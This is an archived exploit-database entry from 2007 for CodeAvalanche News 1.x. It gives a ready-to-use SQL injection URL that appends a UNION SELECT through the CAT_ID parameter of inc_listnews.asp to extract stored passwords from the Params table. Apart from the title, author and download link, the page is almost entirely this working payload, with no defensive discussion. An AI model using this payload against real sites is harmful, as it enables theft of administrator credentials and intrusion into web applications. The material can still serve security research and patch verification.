CodeAvalanche News 1.x (CAT_ID) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CodeAvalanche News 1.x (CAT_ID) Remote SQL Injection Vulnerability
# Published : 2007-02-15
# Author : beks
# Previous Title : nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability
# Next Title : Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability

#CodeAvalanche News SQL Injection#

Software: CodeAvalanche News

Download: http://www.aspindir.com/indir.asp?id=3315

Risk: High

Found by: beks

http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params

# www.Syue.com [2007-02-15]